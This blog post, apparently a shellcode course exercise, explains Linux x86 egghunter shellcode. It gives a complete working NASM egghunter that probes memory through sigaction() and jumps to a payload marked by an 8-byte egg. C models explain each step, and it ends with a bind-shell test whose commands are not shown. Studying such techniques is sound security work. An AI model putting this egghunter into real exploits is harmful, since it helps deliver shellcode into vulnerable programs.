Tuesday, March 15, 2016

3 - Egghunter Shellcode



One of the issues associated with shellcode is the lack of storage space. In a typical stack-based buffer overflow the buffer is usually large enough to hold the shellcode, but problems arise when there are not enough consecutive memory locations available to hold it.

One technique to address this problem is to place the shellcode in another part of the VAS (Virtual Address Space), whose address is not known in advance and which is therefore not easy to reach. To make the shellcode locatable, a common technique is to create a so-called "egg": a short, easily identifiable pattern of bytes.

The "egg" is prepended to the shellcode, marking its beginning. A small program called an "egghunter" then searches memory for the "egg". Once the "egg" is found, execution is transferred to that location and the shellcode runs.

The "Egghunter" program should have the following characteristics:

1) robustness: since the search may touch unallocated (unmapped) regions of the VAS, an improper dereference would crash the entire program. Therefore, the program must be robust enough to avoid runtime errors such as a segmentation fault.

2) small size: the program should be as small as possible, because it has to fit in the limited space where the full shellcode does not.

3) speed: the search must be fast enough that it does not noticeably delay the execution of the associated payload.

Regarding the "egg", the byte pattern must be unique and identifiable in the memory space, so that it does not collide with other byte sequences. For example, repeating a short pattern makes the "egg" more distinctive, as it decreases the probability that the same pattern appears by chance elsewhere in the program's memory.

Also, the "egg" should be executable and harmless, so that the transfer of execution to the rest of the shellcode (the payload) remains simple and immediate. Although it would be possible to include an offset in the "egghunter" to avoid executing the "egg", this option is not considered advisable because it would unnecessarily increase the total size of the shellcode.
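
As a minimal sketch of the layout described above, the following C helper prepends an egg to an arbitrary payload buffer. The names EGG_KEY, EGG_LEN and tag_payload are illustrative assumptions, not part of the original exercise; the key bytes are the std/cld pattern chosen later in this post, written twice.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical 4-byte key (std; cld; std; cld); the egg is the key twice. */
static const unsigned char EGG_KEY[4] = { 0xfd, 0xfc, 0xfd, 0xfc };
enum { EGG_LEN = 8 };

/*
 * Writes egg + payload into out.
 * Returns the total number of bytes written, or 0 if out is too small.
 */
size_t tag_payload(unsigned char *out, size_t out_cap,
                   const unsigned char *payload, size_t payload_len)
{
    if (out_cap < EGG_LEN || payload_len > out_cap - EGG_LEN)
        return 0;
    memcpy(out, EGG_KEY, 4);                       /* first half of the egg  */
    memcpy(out + 4, EGG_KEY, 4);                   /* second half of the egg */
    memcpy(out + EGG_LEN, payload, payload_len);   /* payload follows the egg */
    return EGG_LEN + payload_len;
}
```

The payload itself is treated as opaque bytes here; only the 8-byte marker in front of it matters to the search.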


- Basically, the "egghunter" program scans memory addresses until it finds the pattern of the "egg". Execution then jumps to that location (the address is loaded into eip) and the associated code is executed.

- Let's examine the program A3.nasm step by step.

- The first two instructions advance ecx, the pointer to the address being validated (as we see later), to the start of the next memory page. A page is the unit in which memory is mapped, so when one address turns out to be invalid the rest of its page can be skipped at once instead of being probed byte by byte. Page size is determined by the processor architecture; 4096 bytes is the smallest page size provided by the x86 platform.

- On the Ubuntu machine running this exercise:

root@lic:/# getconf PAGE_SIZE
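
- The same value can be read from C. This is a minimal sketch using the POSIX sysconf() call; the wrapper name query_page_size is only illustrative:

```c
#include <unistd.h>

/* Returns the page size reported by the running system, or -1 on error. */
long query_page_size(void)
{
    return sysconf(_SC_PAGESIZE);
}
```

On a typical x86 Linux system this is expected to agree with the value printed by getconf.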

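- The logical OR with 0xfff sets the 12 low-order bits of cx (0xfff = 1111 1111 1111) and leaves the remaining bits unchanged, because any bit OR-ed with 1 is 1. The pointer now refers to the last byte of its page: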

or cx,0xfff

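- Incrementing a value whose low 12 bits are 0xfff carries into the next multiple of 0x1000 = 4096 (PAGE_SIZE), that is, the first byte of the next page. When this instruction is reached on its own (label "increment"), ecx simply advances by 1 byte, so that progressively all addresses are visited: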

inc ecx
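
- The arithmetic of these two instructions can be checked with a small C model. The function names are hypothetical; the 32-bit OR stands in for `or cx,0xfff`, which only changes the low 12 bits anyway:

```c
#include <stdint.h>

/* Models `or cx,0xfff`: set the low 12 bits, giving the last byte of the page. */
uint32_t last_byte_of_page(uint32_t addr)
{
    return addr | 0xfffu;
}

/* Models `or cx,0xfff` followed by `inc ecx`: first byte of the next page. */
uint32_t next_page_start(uint32_t addr)
{
    return last_byte_of_page(addr) + 1u;
}
```

For example, next_page_start(0x08048123) yields 0x08049000, while a plain increment of the same address would yield 0x08048124.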

- Why split this process into two instructions instead of using a single one that adds a whole page? The reason is that the later instructions jump to each of the two labels separately. Let's distinguish two cases:

i) If the address is invalid, the program jumps back to the first instruction (label "alignment"). In this case the page alignment is necessary because it can be assumed that all addresses inside the page are also invalid.

ii) If the address is valid but does not hold the "egg", the first instruction is skipped and the program jumps directly to the second one (label "increment"), which advances the pointer to the next address. This process continues until the egg is found.

- Next, the sigaction() syscall is used to validate several addresses of the VAS at the same time, relying on the kernel's verify_area routine. Every time an address is supplied as the act pointer, the kernel checks that the structure it points to, 16 contiguous bytes, lies in valid memory.

root@lic:/# man sigaction

NAME    sigaction - examine and change a signal action
SYNOPSIS    int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);
DESCRIPTION   The sigaction() system call is used to change the action taken by a process on receipt of a specific signal. 
       - signum specifies the signal and can be any valid signal except SIGKILL and SIGSTOP.
       - If act is non-NULL, the new action for signal signum is installed from act.  
       - If oldact is non-NULL, the previous action is saved in oldact.
RETURN VALUE        sigaction() returns 0 on success; on error, -1 is returned, and errno is set to indicate the error.
ERRORS       EFAULT act or oldact points to memory which is not a valid part of the process address space.

- The identifier for sigaction() is 67=0x43:

root@lic:/usr/include/i386-linux-gnu/asm# cat unistd_32.h
#define __NR_sigaction 67

- According to the usual register layout for Linux IA-32 syscalls, the arguments for sigaction() must be placed in these registers:

eax <- syscall identifier = 0x43
ebx <- signum
ecx <- act = pointer to the region of memory addresses to be validated 
edx <- oldact = saves the previous action

- The sigaction() syscall is invoked. The egghunter only sets eax and ecx; ebx and edx keep whatever values they already hold:

xor eax,eax
mov al, 0x43
int 0x80

- Now, the memory address pointed to by ecx must be validated. Linux system errors are a set of codes returned when system requests fail. The EFAULT error code is returned when a system call is given a pointer to an invalid memory address. In this way, the Egghunter program can safely travel across the VAS without dereferencing invalid memory regions itself. At the raw syscall level the kernel returns the negated error code in eax: EFAULT is 14, so eax holds -14 = 0xfffffff2. It is therefore enough to compare the low byte of eax (al) with the low byte of that value, 0xf2:

cmp al, 0xf2;
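
- The origin of the 0xf2 constant can be verified in C. This is a sketch that assumes EFAULT is 14, as on Linux; the function name raw_error_low_byte is illustrative:

```c
#include <errno.h>
#include <stdint.h>

/* Low byte of the raw syscall return value (-errno) for a given error code. */
uint8_t raw_error_low_byte(int err)
{
    uint32_t raw = (uint32_t)(-err);   /* what the kernel leaves in eax */
    return (uint8_t)(raw & 0xffu);     /* what the egghunter sees in al */
}
```

With err = EFAULT the raw value is 0xfffffff2 and the function returns 0xf2, the constant used in the comparison.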

- If al matches the low byte of the EFAULT error code, the address is invalid, and the process must start again by jumping to the first label "alignment":

je alignment

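- Otherwise, once the memory region is known to be valid, the "egg" key is loaded into eax. Because x86 is little-endian, the bytes appear in memory in the reverse order of the written constant. The "egg" consists of 8 bytes: the same 4-byte (32-bit) key repeated twice, which allows two successive 4-byte comparisons against the memory pointed to by edi, as seen in the next instructions. Repeating the key also prevents the egghunter from matching its own code, which contains the key only once.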

- As for the content of the "egg" itself, it is recommended that it be executable. For instance, let's take a sequence of std (opcode 0xfd) and cld (opcode 0xfc) instructions. Together they have no net effect, because the direction flag ends up cleared:

mov eax, 0xfcfdfcfd
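
- To see how the constant is laid out in memory, here is a small, portable C sketch that stores a 32-bit value least significant byte first, as x86 does. The helper name store_le32 is an assumption for illustration:

```c
#include <stdint.h>

/* Stores a 32-bit value in little-endian order: least significant byte first. */
void store_le32(uint32_t value, unsigned char out[4])
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

For 0xfcfdfcfd the resulting bytes are fd fc fd fc, which decode as std, cld, std, cld.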

- Now, the address currently being searched, held in ecx, is copied to edi:

mov edi,ecx

- The scasd instruction compares eax (the 4-byte "egg" key) with the doubleword stored at the memory address held in edi, sets the flags accordingly, and then advances edi by 4 bytes (when the direction flag is cleared).

scasd

- If they do not match, the program jumps to label "increment" to try the next memory address:

jnz increment

 - If they match, the next 4 bytes in memory are compared with the same key, to check the second half of the "egg":

scasd

- Again, if they do not match, the program jumps to label "increment" to try the next memory address:

jnz increment
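
- The two comparisons can be modelled in C as follows. This is only a sketch: scasd_model and check_egg_at are hypothetical names, the direction flag is assumed to be cleared, and the caller must guarantee that 8 bytes are readable at addr:

```c
#include <stddef.h>
#include <stdint.h>

/* Reads a little-endian doubleword from memory. */
static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Models scasd with DF = 0: compares eax with the doubleword at *edi,
 * then advances *edi by 4. Returns 1 when they are equal (ZF set).
 */
int scasd_model(uint32_t eax, const unsigned char **edi)
{
    int equal = (load_le32(*edi) == eax);
    *edi += 4;
    return equal;
}

/* Two successive comparisons; NULL corresponds to taking "jnz increment". */
const unsigned char *check_egg_at(const unsigned char *addr, uint32_t key)
{
    const unsigned char *edi = addr;
    if (!scasd_model(key, &edi))
        return NULL;
    if (!scasd_model(key, &edi))
        return NULL;
    return edi;   /* addr + 8: the first byte after the egg */
}
```

Note that on success the returned pointer is 8 bytes past the start of the egg, because each comparison moves edi forward by 4.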

- Finally, when both halves match, the "egg" has been found. Since each scasd advanced edi by 4 bytes, edi now points just past the 8-byte "egg", at the first byte of the payload. The program jumps unconditionally to the address held in edi, and the shellcode is executed:

jmp edi

- The whole program A3.nasm:

global _start
section .text

_start:
alignment:                      ; page alignment: point at the last byte of the page
    or cx,0xfff
increment:                      ; next address
    inc ecx
    xor eax,eax
    mov al,0x43                 ; sigaction() syscall number
    int 0x80
    cmp al,0xf2                 ; low byte of -EFAULT
    je alignment                ; invalid address: skip to the next page
    mov eax,0xfcfdfcfd          ; load the 4-byte "egg" key into eax
    mov edi,ecx                 ; copy the current address into edi
    scasd                       ; compare with the first half of the "egg"
    jnz increment               ; no match: try the next address
    scasd                       ; compare with the second half of the "egg"
    jnz increment               ; no match: try the next address
    jmp edi                     ; match: edi points just past the "egg",
                                ; at the first byte of the payload
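
- The control flow of the whole program can be followed in a harmless C model that walks a simulated address space instead of real memory. Everything here (PAGE, struct sim_vas, probe_ok, hunt) is a hypothetical stand-in: probe_ok plays the role of the sigaction() check, and the end-of-memory test exists only in the simulation, since the real egghunter has no stop condition.

```c
#include <stdint.h>

enum { PAGE = 0x1000 };

/* Simulated address space: mem holds npages * PAGE bytes and
 * page_ok[i] is nonzero when page i counts as mapped. */
struct sim_vas {
    const unsigned char *mem;
    const unsigned char *page_ok;
    uint32_t npages;
};

/* Reads a little-endian doubleword from memory. */
static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Stand-in for the syscall probe: are the 16 bytes at addr all mapped? */
static int probe_ok(const struct sim_vas *v, uint32_t addr)
{
    uint32_t end = v->npages * PAGE;
    if (addr >= end || end - addr < 16)
        return 0;
    return v->page_ok[addr / PAGE] && v->page_ok[(addr + 15) / PAGE];
}

/* Returns the offset just past the egg (the value of edi at "jmp edi"),
 * or -1 if the simulated memory is exhausted. */
long hunt(const struct sim_vas *v, uint32_t key, uint32_t start)
{
    uint32_t end = v->npages * PAGE;
    uint32_t ecx = start;
    int fault = 1;                       /* execution begins at "alignment" */

    for (;;) {
        if (fault)
            ecx |= 0xfffu;               /* alignment: or cx,0xfff */
        ecx += 1;                        /* increment: inc ecx */
        if (ecx >= end)
            return -1;                   /* simulation-only stop condition */
        fault = !probe_ok(v, ecx);       /* int 0x80 / cmp al,0xf2 */
        if (fault)
            continue;                    /* je alignment */
        if (load_le32(v->mem + ecx) != key)
            continue;                    /* first scasd / jnz increment */
        if (load_le32(v->mem + ecx + 4) != key)
            continue;                    /* second scasd / jnz increment */
        return (long)ecx + 8;            /* jmp edi */
    }
}
```

In this model an unmapped page costs a single probe, while a mapped page is scanned one byte at a time, which mirrors the roles of the "alignment" and "increment" labels.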


- Assembling and linking A3.nasm:

- Extracting the shellcode:

- For testing purposes, the Shell Bind TCP program from A1 will be used. The shellcode extracted from A3.nasm is placed in ShellcodeTest.c:

- Compiling ShellcodeTest.c:

- Executing ShellcodeTest.c:

- Using nc from another console, the execution of the Shell Bind TCP shellcode is successful: